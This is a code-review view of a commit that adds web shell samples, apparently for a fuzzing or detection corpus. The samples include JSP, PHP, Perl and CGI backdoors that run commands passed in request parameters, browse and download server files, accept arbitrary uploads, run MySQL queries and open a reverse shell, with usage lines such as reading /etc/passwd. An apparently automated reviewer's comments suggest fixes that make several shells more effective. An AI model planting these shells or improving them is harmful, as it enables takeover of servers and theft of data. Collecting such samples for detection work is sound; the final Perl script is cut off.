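Review bot: The read loop on lines 783–787 writes before it checks, so the final `-1` from `read()` is passed to `printwriter.write(int)` and a stray U+FFFF character is appended to every file served; restructure as `while ((j = fileinputstream.read()) != -1) printwriter.write(j);`. Serving file bytes through the character-oriented `PrintWriter` also passes them through the response charset, so binary files come out corrupted — use `res.getOutputStream()` in the file branch. Lines 740 and 775 place `path` and each file name into HTML and `href` values without encoding, and no `Content-Type` is set anywhere in `doGet`.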



@ -0,0 +1,71 @@
/*
* UpServlet.java 29/04/2005
*
* @author The Dark Raver
* @version 0.1
*/
import java.io.*;
import javax.servlet.*;
import javax.servlet.http.*;
public class UpServlet extends HttpServlet {
public void doGet(HttpServletRequest req, HttpServletResponse res) throws ServletException, IOException {
res.setContentType("text/html");
PrintWriter out = res.getWriter();
out.print("<html><body>");
out.print("<br><form method=\"POST\" action=\"\" enctype=\"multipart/form-data\">");
out.print("UPLOAD <input type=\"file\" name=\"file\" size=\"60\">");
out.print("<input type=\"submit\" value=\"Upload\">");
out.print("</form>");
out.print("</body></html>");
}
public void doPost(HttpServletRequest req, HttpServletResponse res) throws ServletException, IOException {
String tag = new String();
int c = '\0';
int contador = 0;
ServletInputStream in = req.getInputStream();
DataInputStream post = new DataInputStream(in);
PrintWriter out = res.getWriter();
res.setContentType("text/html");
out.print("<pre>");
while((c=post.read()) != -1 && c != '\r' && c != '\n') {
tag=tag.concat("" + (char)c);
contador++;
}
for(int i=0; i <4; i++) while((c=post.read()) != -1 && c != '\n') contador++;
// out.print("CONTENT_LEN = " + req.getContentLength() + " / TAG = [" + tag + "] / TAG_LEN = " + tag.length() + "\n");
// out.print("CONTADOR = " + contador + " / FILE_LEN = " + (req.getContentLength() - tag.length() - contador - 11) + " ==>");
// (!) Uploaded File Name
File newfile = new File("c:\\install.log");
/////////////////////////
FileOutputStream fileout = new FileOutputStream(newfile);
for(int i=0; i < req.getContentLength() - tag.length() - contador - 11; i++) {
c=post.read();
fileout.write((char)c);
}
fileout.close();
out.print("<== OK");
}
public String getServletInfo() {
return "UpServlet 0.1";
}
}
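Review bot: `doPost` calls `res.getWriter()` on line 830 before `res.setContentType()` on line 831, so the content type and the charset it would select are not applied to the response; swap the two lines. The destination is hard-coded to `c:\\install.log` on line 841 — the `(!)` marker suggests it is meant to be edited per deployment, but the multipart filename or a request parameter would be the obvious source. The copy loop on lines 844–847 ignores `-1` from `post.read()` and relies on `contentLength - tag.length() - contador - 11` to locate the trailing boundary, which I cannot confirm is right for every client's multipart framing; checking for EOF inside the loop at least prevents writing `0xFF` bytes past a short body.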



@ -0,0 +1,35 @@
<%@ page import="java.util.*,java.io.*"%>
<%
//
// JSP_KIT
//
// cmd.jsp = Command Execution (unix)
//
// by: Unknown
// modified: 27/06/2003
//
%>
<HTML><BODY>
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<%
if (request.getParameter("cmd") != null) {
out.println("Command: " + request.getParameter("cmd") + "<BR>");
Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream(in);
String disr = dis.readLine();
while ( disr != null ) {
out.println(disr);
disr = dis.readLine();
}
}
%>
</pre>
</BODY></HTML>
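Review bot: `Runtime.exec(String)` on line 881 tokenizes the command on whitespace and runs it directly — no shell — so pipes, redirection and globbing in `cmd` do nothing, unlike the win32 sibling that goes through `cmd.exe /c`; `Runtime.getRuntime().exec(new String[]{"/bin/sh", "-c", request.getParameter("cmd")})` gives the semantics the "(unix)" label implies. `DataInputStream.readLine()` on lines 885 and 888 is deprecated because it does not properly convert bytes to characters; a `BufferedReader` over an `InputStreamReader` is the replacement, and `p.getErrorStream()` is never read at all. Line 880 also echoes the command into the page unencoded, and the GET form on line 873 places every command in the access log.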


@ -0,0 +1,32 @@
// note that linux = cmd and windows = "cmd.exe /c + cmd"
<FORM METHOD=GET ACTION='cmdjsp.jsp'>
<INPUT name='cmd' type=text>
<INPUT type=submit value='Run'>
</FORM>
<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd");
String output = "";
if(cmd != null) {
String s = null;
try {
Process p = Runtime.getRuntime().exec("cmd.exe /C " + cmd);
BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream()));
while((s = sI.readLine()) != null) {
output += s;
}
}
catch(IOException e) {
e.printStackTrace();
}
}
%>
<pre>
<%=output %>
</pre>
<!-- http://michaeldaw.org 2006 -->
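Review bot: Line 913 appends each output line with `output += s;` and drops the line terminator, so multi-line results are run together inside the `<pre>`; `output += s + "\n";` restores them. The comment on line 898 sits outside any scriptlet tag and is therefore emitted into the page as visible text; move it inside `<% ... %>` or delete it. `e.printStackTrace()` on line 917 writes the trace to the container's stdout/log rather than the page, which is useless to the operator and a loud artefact for anyone reading the logs; line 922 also emits `output` unencoded.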


@ -0,0 +1,91 @@
// backdoor.jsp
// http://www.security.org.sg/code/jspreverse.html
<%@
page import="java.lang.*, java.util.*, java.io.*, java.net.*"
% >
<%!
static class StreamConnector extends Thread
{
InputStream is;
OutputStream os;
StreamConnector(InputStream is, OutputStream os)
{
this.is = is;
this.os = os;
}
public void run()
{
BufferedReader isr = null;
BufferedWriter osw = null;
try
{
isr = new BufferedReader(new InputStreamReader(is));
osw = new BufferedWriter(new OutputStreamWriter(os));
char buffer[] = new char[8192];
int lenRead;
while( (lenRead = isr.read(buffer, 0, buffer.length)) > 0)
{
osw.write(buffer, 0, lenRead);
osw.flush();
}
}
catch (Exception ioe)
try
{
if(isr != null) isr.close();
if(osw != null) osw.close();
}
catch (Exception ioe)
}
}
%>
<h1>JSP Backdoor Reverse Shell</h1>
<form method="post">
IP Address
<input type="text" name="ipaddress" size=30>
Port
<input type="text" name="port" size=10>
<input type="submit" name="Connect" value="Connect">
</form>
<p>
<hr>
<%
String ipAddress = request.getParameter("ipaddress");
String ipPort = request.getParameter("port");
if(ipAddress != null && ipPort != null)
{
Socket sock = null;
try
{
sock = new Socket(ipAddress, (new Integer(ipPort)).intValue());
Runtime rt = Runtime.getRuntime();
Process proc = rt.exec("cmd.exe");
StreamConnector outputConnector =
new StreamConnector(proc.getInputStream(),
sock.getOutputStream());
StreamConnector inputConnector =
new StreamConnector(sock.getInputStream(),
proc.getOutputStream());
outputConnector.start();
inputConnector.start();
}
catch(Exception e)
}
%>
<!-- http://michaeldaw.org 2006 -->
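Review bot: As shown, this page does not compile: the `catch (Exception ioe)` clauses on lines 960, 966 and 1000 have no block body, and the page directive closes with `% >` on line 933 (a space inside the delimiter). Each catch needs at least `catch (Exception ioe) { }`, and line 933 should read `%>`; I cannot tell from the rendering whether this is a paste artefact or how the file was committed, so it is worth checking the blob directly. `rt.exec("cmd.exe")` on line 990 makes the page Windows-only, and nothing closes the socket or destroys the process when either `StreamConnector` exits, so a dropped connection leaves a `cmd.exe` child alive under the servlet container.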


@ -0,0 +1,77 @@
<%@ page import="java.util.*,java.io.*"%>
<%
//
// JSP_KIT
//
// list.jsp = Directory & File View
//
// by: Sierra
// modified: 27/06/2003
//
%>
<%
if(request.getParameter("file")==null) {
%>
<HTML><BODY>
<FORM METHOD="POST" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="file">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<%
}
%>
<% //read the file name.
try {
File f = new File(request.getParameter("file"));
if(f.isDirectory()) {
int i;
String fname = new String("Unknown");
String fcolor = new String("Black");
%>
<HTML><BODY>
<FONT Face="Courier New, Helvetica" Color="Black">
<%
out.print("<B>Path: <U>" + f.toString() + "</U></B><BR> <BR>");
File flist[] = f.listFiles();
for(i=0; i<flist.length; i++) {
fname = new String( flist[i].toString());
out.print("(");
if(flist[i].isDirectory() == true) {
out.print("d");
fname = fname + "/";
fcolor = new String("Blue");
} else if( flist[i].isFile() == true ) {
out.print("-");
fcolor = new String("Green");
} else {
out.print("?");
fcolor = new String("Red");
}
if(flist[i].canRead() == true) out.print("r" ); else out.print("-");
if(flist[i].canWrite() == true) out.print("w" ); else out.print("-");
out.print(") <A Style='Color: " + fcolor.toString() + ";' HRef='?file=" + fname.toString() + "'>" + fname.toString() + "</A> " + "( Size: " + flist[i].length() + " bytes)<BR>\n");
}
%>
</FONT></BODY></HTML>
<%
} else {
if(f.canRead() == true) {
InputStream in = new FileInputStream(f);
ServletOutputStream outs = response.getOutputStream();
int left = 0;
try {
while((left) >= 0 ) {
left = in.read();
outs.write(left);
}
} catch(IOException ex) {ex.printStackTrace();}
outs.flush();
outs.close();
in.close();
} else {
out.print("Can't Read file<BR>");
}
}
} catch(Exception ex) {ex.printStackTrace();}
%>
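Review bot: The file-streaming loop on lines 1070–1073 writes before it tests `left`, so the final `-1` from `in.read()` is passed to `outs.write(int)` and an extra `0xFF` byte is appended to every downloaded file; use `while ((left = in.read()) != -1) outs.write(left);`. Calling `response.getOutputStream()` on line 1067 after the page has already been writing through the JSP `out` writer may raise `IllegalStateException` on some containers once `out` has flushed — I have not confirmed this against a specific container, but it is the usual reason this pattern fails. Both `catch` blocks (lines 1074 and 1082) only `printStackTrace()`, so errors go to the server log instead of the page, and `fname` is placed in an `href` on line 1059 without URL-encoding.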

162
fuzzdb-webshell/jsp/up.jsp Normal file

@ -0,0 +1,162 @@
<jsp:useBean id="prop" scope="page" class="java.util.Properties" />
<%@ page import="java.io.*,java.util.*,javax.servlet.*" %>
<%
//
// JSP_KIT
//
// up.jsp = File Upload (unix)
//
// by: Unknown
// modified: 27/06/2003
//
%>
<html>
<form name="test" method="post" action="" enctype="multipart/form-data">
<input type="File" name="fichero">
<input type="Submit" value="Upload" name="Submit">
</form>
</html>
<%!
public String getBoundary(HttpServletRequest request,Properties prop) throws ServletException,IOException{
String boundary = null;
Enumeration enum = request.getHeaderNames();
while(enum.hasMoreElements()){
String header = (String)enum.nextElement();
String hvalue = request.getHeader(header);
prop.setProperty((header).toLowerCase(),hvalue);
if("content-type".equalsIgnoreCase(header) ){
int idx = hvalue.lastIndexOf("boundary=");
if(idx != -1 ){
boundary= hvalue.substring(idx+9 , hvalue.length());
}
}
}
return boundary;
}
public String getFileName(String secondline){
int len = secondline.length();
int idx = secondline.lastIndexOf("filename=");
if(idx == -1 ) return null;
String filename = secondline.substring(idx+10 , len-1);
filename = filename.replace('\\','/');
idx = filename.lastIndexOf("/");
idx = idx + 1;
filename = filename.substring( idx );
return filename;
}
%>
<%
String DPATH = "/tmp/";
int ROUGHSIZE = 640000; // BUG: Corta el fichero si es mayor de 640Ks
int MAXSIZE = 10; // 10 Mega Byte
String boundary = getBoundary(request,prop);
if(boundary == null ){
boundary = prop.getProperty("boundary");
}else{
boundary = "--"+boundary;
}
if(boundary == null ){
return;
}
Long contentsize = new Long(prop.getProperty("content-length","0"));
int c;
StringWriter st = new StringWriter();
if(contentsize.longValue() < 1L ){
return;
}
long l = contentsize.longValue() - ROUGHSIZE;
int KB = 1024;
int MB = 1024 * KB;
int csize = (int)(l / MB);
if(csize > MAXSIZE ){
return;
}
ServletInputStream fin = request.getInputStream();
int cn;
int count=0;
while((c=fin.read()) != -1 ){
if( c == '\r') break;
st.write(c);
count++;
}
c=fin.read();
String tboundary = st.getBuffer().toString();
tboundary=tboundary.trim();
if(! tboundary.equalsIgnoreCase( boundary) ){
return;
}
st.close();
st = null;
st = new StringWriter();
while((c=fin.read()) != -1 ){
if( c == '\r' ) break;
st.write(c);
}
c=fin.read();
String secondline = st.getBuffer().toString();
String filename = getFileName(secondline);
st.close();
st = null;
st = new StringWriter();
while((c=fin.read()) != -1 ){
if( c == '\r' ) break;
st.write( c );
}
c=fin.read();
fin.read();
fin.read();
File newfile = null;
FileOutputStream fout =null;
try{
if(filename == null) throw new FileNotFoundException("File Name not found");
newfile = new File(DPATH+filename);
fout = new FileOutputStream( newfile );
}catch(FileNotFoundException fnexp){
fin.close();
return;
}
byte b[] = null;
while(l > 1024L){
b = new byte[1024];
fin.read(b,0,1024);
fout.write(b);
b=null;
l -= 1024L;
}
if(l > 0){
b = new byte[(int)l];
fin.read(b,0,(int)l);
fout.write(b);
}
ByteArrayOutputStream baos = new ByteArrayOutputStream();
while((c = fin.read()) != -1){
baos.write(c);
}
String laststring = baos.toString();
int idx = laststring.indexOf(boundary);
b = baos.toByteArray();
if(idx > 2){
fout.write(b,0,idx-2);
}else{
fout.close();
newfile.delete();
return;
}
fout.flush();
fout.close();
fin.close();
out.println("FileName: " + newfile.getName());
out.println("FileSize: " + newfile.length());
%>
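Review bot: `Enumeration enum` on lines 1111–1113 uses `enum` as an identifier, which has been a reserved word since Java 5, so this page fails to translate on any current JDK; renaming it to `Enumeration names` fixes that. The copy loop on lines 1208–1219 ignores the count returned by `fin.read(b, 0, 1024)` and always writes the full buffer, so any short read inserts stale or zero bytes into the saved file; loop on the returned length and write only that many bytes. The `ROUGHSIZE` scheme (line 1139, already flagged as a bug in the Spanish comment, which says the file is truncated above 640 KB) estimates the file length from `Content-Length` and buffers the remainder in memory to find the closing boundary, which also means the `MAXSIZE` check on line 1160 is only enforced against that estimate.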


@ -0,0 +1,31 @@
<%@ page import="java.util.*,java.io.*,java.net.*"%>
<%
//
// JSP_KIT
//
// cmd.jsp = Command Execution (win32)
//
// by: Unknown
// modified: 27/06/2003
//
%>
<HTML><BODY>
<FORM METHOD="POST" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<%
if (request.getParameter("cmd") != null) {
out.println("Command: " + request.getParameter("cmd") + "\n<BR>");
Process p = Runtime.getRuntime().exec("cmd.exe /c " + request.getParameter("cmd"));
OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream(in);
String disr = dis.readLine();
while ( disr != null ) {
out.println(disr); disr = dis.readLine(); }
}
%>
</pre>
</BODY></HTML>
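Review bot: The header at L1247–L1252 records `by: Unknown` and `modified: 27/06/2003` but no source URL or licence, so the provenance of this sample cannot be traced from the file itself. Samples in a corpus like this are normally kept byte-for-byte so that signatures written against them keep matching, so the provenance is better recorded in an accompanying README or index entry than by editing the sample. The same gap applies to the ASP, PHP, Perl, CGI and servlet samples added in this commit, several of which carry no author line at all.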


@ -0,0 +1,162 @@
<jsp:useBean id="prop" scope="page" class="java.util.Properties" />
<%@ page import="java.io.*,java.util.*,javax.servlet.*" %>
<%
//
// JSP_KIT
//
// up.jsp = File Upload (win32)
//
// by: Unknown
// modified: 27/06/2003
//
%>
<html>
<form name="test" method="post" action="" enctype="multipart/form-data">
<input type="File" name="fichero">
<input type="Submit" value="Upload" name="Submit">
</form>
</html>
<%!
public String getBoundary(HttpServletRequest request,Properties prop) throws ServletException,IOException{
String boundary = null;
Enumeration enum = request.getHeaderNames();
while(enum.hasMoreElements()){
String header = (String)enum.nextElement();
String hvalue = request.getHeader(header);
prop.setProperty((header).toLowerCase(),hvalue);
if("content-type".equalsIgnoreCase(header) ){
int idx = hvalue.lastIndexOf("boundary=");
if(idx != -1 ){
boundary= hvalue.substring(idx+9 , hvalue.length());
}
}
}
return boundary;
}
public String getFileName(String secondline){
int len = secondline.length();
int idx = secondline.lastIndexOf("filename=");
if(idx == -1 ) return null;
String filename = secondline.substring(idx+10 , len-1);
filename = filename.replace('\\','/');
idx = filename.lastIndexOf("/");
idx = idx + 1;
filename = filename.substring( idx );
return filename;
}
%>
<%
String DPATH = "c:\\";
int ROUGHSIZE = 640000; // BUG: Corta el fichero si es mayor de 640Ks
int MAXSIZE = 10; // 10 Mega Byte
String boundary = getBoundary(request,prop);
if(boundary == null ){
boundary = prop.getProperty("boundary");
}else{
boundary = "--"+boundary;
}
if(boundary == null ){
return;
}
Long contentsize = new Long(prop.getProperty("content-length","0"));
int c;
StringWriter st = new StringWriter();
if(contentsize.longValue() < 1L ){
return;
}
long l = contentsize.longValue() - ROUGHSIZE;
int KB = 1024;
int MB = 1024 * KB;
int csize = (int)(l / MB);
if(csize > MAXSIZE ){
return;
}
ServletInputStream fin = request.getInputStream();
int cn;
int count=0;
while((c=fin.read()) != -1 ){
if( c == '\r') break;
st.write(c);
count++;
}
c=fin.read();
String tboundary = st.getBuffer().toString();
tboundary=tboundary.trim();
if(! tboundary.equalsIgnoreCase( boundary) ){
return;
}
st.close();
st = null;
st = new StringWriter();
while((c=fin.read()) != -1 ){
if( c == '\r' ) break;
st.write(c);
}
c=fin.read();
String secondline = st.getBuffer().toString();
String filename = getFileName(secondline);
st.close();
st = null;
st = new StringWriter();
while((c=fin.read()) != -1 ){
if( c == '\r' ) break;
st.write( c );
}
c=fin.read();
fin.read();
fin.read();
File newfile = null;
FileOutputStream fout =null;
try{
if(filename == null) throw new FileNotFoundException("File Name not found");
newfile = new File(DPATH+filename);
fout = new FileOutputStream( newfile );
}catch(FileNotFoundException fnexp){
fin.close();
return;
}
byte b[] = null;
while(l > 1024L){
b = new byte[1024];
fin.read(b,0,1024);
fout.write(b);
b=null;
l -= 1024L;
}
if(l > 0){
b = new byte[(int)l];
fin.read(b,0,(int)l);
fout.write(b);
}
ByteArrayOutputStream baos = new ByteArrayOutputStream();
while((c = fin.read()) != -1){
baos.write(c);
}
String laststring = baos.toString();
int idx = laststring.indexOf(boundary);
b = baos.toByteArray();
if(idx > 2){
fout.write(b,0,idx-2);
}else{
fout.close();
newfile.delete();
return;
}
fout.flush();
fout.close();
fin.close();
out.println("FileName: " + newfile.getName());
out.println("FileSize: " + newfile.length());
%>
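Review bot: L1339–L1427 of this up.jsp are byte-for-byte the same as the tail of the preceding file section (L1150–L1238), so the commit appears to add the same upload sample twice under different paths; either one copy should be dropped or the corpus index should state why both exist. The only comment that documents behaviour, `// BUG: Corta el fichero si es mayor de 640Ks` at L1328, is in Spanish and says the sample truncates files larger than 640 KB; that known limitation belongs in the index entry for the sample rather than being fixed in the file.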


@ -0,0 +1,25 @@
<?
//
// PHP_KIT
//
// cmd.php = Command Execution
//
// by: The Dark Raver
// modified: 21/01/2004
//
?>
<HTML><BODY>
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<?
if($_GET['cmd']) {
system($_GET['cmd']);
}
?>
</pre>
</BODY></HTML>


@ -0,0 +1,33 @@
<?
//
// PHP_KIT
//
// list.php = Directory & File Listing
//
// by: The Dark Raver
// modified: 21/01/2004
//
?>
<?
if($_GET['file']) {
$fichero=$_GET['file'];
} else {
$fichero="/";
}
if($handle = @opendir($fichero)) {
while($filename = readdir($handle)) {
echo "( ) <a href=?file=" . $fichero . "/" . $filename . ">" . $filename . "</a><br>";
}
closedir($handle);
} else {
echo "FILE: " . $fichero . "<br><hr><pre>";
$fp = fopen($fichero, "r");
$buffer = fread($fp, filesize($fichero));
echo $buffer;
fclose($fp);
}
?>


@ -0,0 +1,71 @@
<?
// a simple php backdoor | coded by z0mbie [30.08.03] | http://freenet.am/~zombie \\
ob_implicit_flush();
if(isset($_REQUEST['f'])){
$filename=$_REQUEST['f'];
$file=fopen("$filename","rb");
fpassthru($file);
die;
}
if(isset($_REQUEST['d'])){
$d=$_REQUEST['d'];
echo "<pre>";
if ($handle = opendir("$d")) {
echo "<h2>listing of $d</h2>";
while ($dir = readdir($handle)){
if (is_dir("$d/$dir")) echo "<a href='$PHP_SELF?d=$d/$dir'><font color=grey>";
else echo "<a href='$PHP_SELF?f=$d/$dir'><font color=black>";
echo "$dir\n";
echo "</font></a>";
}
} else echo "opendir() failed";
closedir($handle);
die ("<hr>");
}
if(isset($_REQUEST['c'])){
echo "<pre>";
system($_REQUEST['c']);
die;
}
if(isset($_REQUEST['upload'])){
if(!isset($_REQUEST['dir'])) die('hey,specify directory!');
else $dir=$_REQUEST['dir'];
$fname=$HTTP_POST_FILES['file_name']['name'];
if(!move_uploaded_file($HTTP_POST_FILES['file_name']['tmp_name'], $dir.$fname))
die('file uploading error.');
}
if(isset($_REQUEST['mquery'])){
$host=$_REQUEST['host'];
$usr=$_REQUEST['usr'];
$passwd=$_REQUEST['passwd'];
$db=$_REQUEST['db'];
$mquery=$_REQUEST['mquery'];
mysql_connect("$host", "$usr", "$passwd") or
die("Could not connect: " . mysql_error());
mysql_select_db("$db");
$result = mysql_query("$mquery");
if($result!=FALSE) echo "<pre><h2>query was executed correctly</h2>\n";
while ($row = mysql_fetch_array($result,MYSQL_ASSOC)) print_r($row);
mysql_free_result($result);
die;
}
?>
<pre><form action="<? echo $PHP_SELF; ?>" METHOD=GET >execute command: <input type="text" name="c"><input type="submit" value="go"><hr></form>
<form enctype="multipart/form-data" action="<?php echo $PHP_SELF; ?>" method="post"><input type="hidden" name="MAX_FILE_SIZE" value="1000000000">
upload file:<input name="file_name" type="file"> to dir: <input type="text" name="dir">&nbsp;&nbsp;<input type="submit" name="upload" value="upload"></form>
<hr>to browse go to http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=[directory here]
<br>for example:
http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=/etc on *nix
or http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=c:/windows on win
<hr>execute mysql query:
<form action="<? echo $PHP_SELF; ?>" METHOD=GET >
host:<input type="text" name="host"value="localhost"> user: <input type="text" name="usr" value=root> password: <input type="text" name="passwd">
database: <input type="text" name="db"> query: <input type="text" name="mquery"> <input type="submit" value="execute">
</form>
<!-- http://michaeldaw.org 2006 -->


@ -0,0 +1,17 @@
<!-- Simple PHP backdoor by DK (http://michaeldaw.org) -->
<?php
if(isset($_REQUEST['cmd'])){
echo "<pre>";
$cmd = ($_REQUEST['cmd']);
system($cmd);
echo "</pre>";
die;
}
?>
Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd
<!-- http://michaeldaw.org 2006 -->


@ -0,0 +1,33 @@
<?
//
// PHP_KIT
//
// up.php = File Upload
//
// by: The Dark Raver
// modified: 21/01/2004
//
?>
<html><body>
<form enctype="multipart/form-data" action="" method="post">
<input type="hidden" name="MAX_FILE_SIZE" value="1000000">
<p>Local File: <input name="userfile" type="file">
<p>Remote File: <input name="remotefile" type="text">
<input type="submit" value="Send">
</form><br><br><br>
<?
if(is_uploaded_file($HTTP_POST_FILES['userfile']['tmp_name'])) {
copy($HTTP_POST_FILES['userfile']['tmp_name'], $_POST['remotefile']);
echo "Uploaded file: " . $HTTP_POST_FILES['userfile']['name'];
} else {
echo "No File Uploaded";
}
?>
</html></body>


@ -0,0 +1,67 @@
#!/usr/bin/perl
#
# PerlKit-0.1 - http://www.t0s.org
#
# cmd.pl: Run commands on a webserver
use strict;
my ($cmd, %FORM);
$|=1;
print "Content-Type: text/html\r\n";
print "\r\n";
# Get parameters
%FORM = parse_parameters($ENV{'QUERY_STRING'});
if(defined $FORM{'cmd'}) {
$cmd = $FORM{'cmd'};
}
print '<HTML>
<body>
<form action="" method="GET">
<input type="text" name="cmd" size=45 value="' . $cmd . '">
<input type="submit" value="Run">
</form>
<pre>';
if(defined $FORM{'cmd'}) {
print "Results of '$cmd' execution:\n\n";
print "-"x80;
print "\n";
open(CMD, "($cmd) 2>&1 |") || print "Could not execute command";
while(<CMD>) {
print;
}
close(CMD);
print "-"x80;
print "\n";
}
print "</pre>";
sub parse_parameters ($) {
my %ret;
my $input = shift;
foreach my $pair (split('&', $input)) {
my ($var, $value) = split('=', $pair, 2);
if($var) {
$value =~ s/\+/ /g ;
$value =~ s/%(..)/pack('c',hex($1))/eg;
$ret{$var} = $value;
}
}
return %ret;
}


@ -0,0 +1,116 @@
#!/usr/bin/perl
#
# PerlKit-0.1 - http://www.t0s.org
#
# browse.pl: Browse and download files from a webserver
use strict;
my ($path, %FORM);
$|=1;
# Get parameters
%FORM = parse_parameters($ENV{'QUERY_STRING'});
if(defined $FORM{'path'}) {
$path = $FORM{'path'};
} else {
$path = "/";
}
if(-f $path) { # Download selected file
print "Content-Type: application/octet-stream\r\n";
print "\r\n";
open(FILE, "< $path") || print "Could not open file\n";
while(<FILE>) {
print;
}
close(FILE);
exit;
}
print "Content-Type: text/html\r\n";
print "\r\n";
print '<HTML>
<body>
<form action="" method="GET">
<input type="text" name="path" size=45 value="' . $path . '">
<input type="submit" value="List">
</form>
Directory ' . $path . ' contents:
<p>
<font face="courier">
<table>';
if(defined $FORM{'path'}) {
opendir(DIR, $path) || print "Could not open directory";
foreach (sort(readdir(DIR))) {
print get_fileinfo($path, $_). "\n";
}
closedir(DIR);
}
print "</table></font>";
sub parse_parameters ($) {
my %ret;
my $input = shift;
foreach my $pair (split('&', $input)) {
my ($var, $value) = split('=', $pair, 2);
if($var) {
$value =~ s/\+/ /g ;
$value =~ s/%(..)/pack('c',hex($1))/eg;
$ret{$var} = $value;
}
}
return %ret;
}
sub get_fileinfo ($$) {
my $ret;
my ($dir,$filename) = @_;
my $file = $dir . "/" . $filename;
$file=~s/\/+/\//g;
$ret = "<tr>";
$ret .= "<td>";
if(-d $file) {
$file=~s/\/[^\/]+\/\.\./\//g;
$ret .= "<a href=\"?path=$file\">$filename</a>";
} else {
$ret .= "$filename <a href=\"?path=$file\">[D]</a>" ;
}
$ret .= "</td>";
my ($dev,$ino,$mode,$nlink,$uid,$gid,$rdev,$size, $atime,$mtime,$ctime,$blksize,$blocks) = stat($file);
$ret .= "<td width=30'>&nbsp;</td>";
$ret .= "<td>$size</td>";
$ret .= "<td>". getpwuid($uid) ."</td>";
$ret .= "<td>". getgrgid($gid) ."</td>";
$ret .= "</tr>";
return $ret;
}


@ -0,0 +1,34 @@
#!/usr/bin/perl -w
use strict;
print "Cache-Control: no-cache\n";
print "Content-type: text/html\n\n";
my $req = $ENV{QUERY_STRING};
chomp ($req);
$req =~ s/%20/ /g;
$req =~ s/%3b/;/g;
print "<html><body>";
print '<!-- Simple CGI backdoor by DK (http://michaeldaw.org) -->';
if (!$req) {
print "Usage: http://target.com/perlcmd.cgi?cat /etc/passwd";
}
else {
print "Executing: $req";
}
print "<pre>";
my @cmd = `$req`;
print "</pre>";
foreach my $line (@cmd) {
print $line . "<br/>";
}
print "</body></html>";
# <!-- http://michaeldaw.org 2006 -->


@ -0,0 +1,555 @@
#!/usr/bin/perl
######################################################
# upload a file with netscape 2.0+ or IE 4.0+
# Muhammad A Muquit
# When: Long time ago
# Changelog:
# James Bee" <JamesBee@home.com> reported that from Windows filename
# such as c:\foo\fille.x saves as c:\foo\file.x, Fixed, Jul-22-1999
# Sep-30-2000, muquit@muquit.com
# changed the separator in count.db to | from :
# As in NT : can be a part of a file path, e.g. c:/foo/foo.txt
######################################################
#
# $Revision: 5 $
# $Author: Muquit $
# $Date: 3/28/04 9:38p $
#use strict;
use CGI;
# if you want to restrict upload a file size (in bytes), uncomment the
# next line and change the number
#$CGI::POST_MAX=50000;
$|=1;
my $version="V1.4";
## vvvvvvvvvvvvvvvvvvv MODIFY vvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv
# the text database of the user. The text database contains the |
# separated items, namely login|encrypted password|upload path
# example: muquit|fhy687kq1hger|/usr/local/web/upload/muquit
# if no path is specified, the file must be located in the cgi-bin directory.
#my $g_upload_db="upload.db";
# overwrite the existing file or not. Default is to overwrite
# chanage the value to 0 if you do not want to overwrite an existing file.
my $g_overwrite=1;
# if you want to restrict upload to files with certain extentions, change
# the value of $g_restrict_by_ext=1 and ALSO modify the @g_allowed_ext if you
# want to add other allowable extensions.
my $g_restrict_by_ext=0;
# case insensitive, so file with Jpeg JPEG GIF gif etc will be allowed
my @g_allowed_ext=("jpeg","jpg","gif","png");
## ^^^^^^^^^^^^^^^^^^^ MODIFY ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
#-------------- globals---------- STARTS ------------------
my $query=new CGI;
my $g_debug=0;
my $g_title="File upload";
my $g_upload_path='/tmp';
#-------------- globals---------- ENDS ------------------
print $query->header;
# Java Script for form validation
#
my $JSCRIPT=<<EJS;
var returnVal=true;
var DEBUG=0;
//===========================================================================
// Purpose: check if field is blank or NULL
// Params:
// field (IN)
// errorMsg (IN - MODIFIED)
// fieldTitle (IN)
// Returns:
// errorMsg - error message
// Globals:
// sets global variable (returnVal) to FALSE if field is blank or NULL
// Comments:
// JavaScript code adapted from netscape software registration form.
// ma_muquit\@fccc.edu, May-09-1997
//===========================================================================
function ValidateAllFields(obj)
{
returnVal = true;
errorMsg = "The required field(s):\\n";
// make sure all the fields have values
if (isSomeFieldsEmpty(obj) == true)
{
// DISPLAY ERROR MSG
displayErrorMsg();
returnVal = false;
}
if (returnVal == true)
document.forms[0].submit();
else
return (false);
}
//===========================================================================
function displayErrorMsg()
{
errorMsg += "\\nhas not been completed.";
alert(errorMsg);
}
//===========================================================================
function isSomeFieldsEmpty(obj)
{
var
returnVal3=false;
// check if login is null
# if (obj.userid.value == "" || obj.userid.value == null)
# {
# errorMsg += " " + "Userid" + "\\n";
# returnVal3=true;
# }
// check if Password is null
# if (obj.password.value == "" || obj.password.value == null)
# {
# errorMsg += " " + "Password" + "\\n";
# returnVal3=true;
# }
// check if upload_file is null
if (obj.upload_file.value == "" || obj.upload_file.value == null)
{
errorMsg += " " + "Upload filename" + "\\n";
returnVal3=true;
}
return (returnVal3);
}
EJS
;
# print the HTML HEADER
&printHTMLHeader;
if ($query->path_info eq "/author" or $query->path_info eq "/about")
{
&printForm;
&printAuthorInfo;
return;
}
if ($query->param)
{
&doWork();
}
else
{
&printForm();
}
##-----
# printForm() - print the HTML form
##-----
sub printForm
{
print "<center>\n";
print "<table border=0 bgcolor=\"#c0c0c0\" cellpadding=5 cellspacing=0>\n";
print $query->start_multipart_form,"\n";
#------------- userid
#print "<tr>\n";
#print "<td align=\"right\">\n";
#print "Userid:\n";
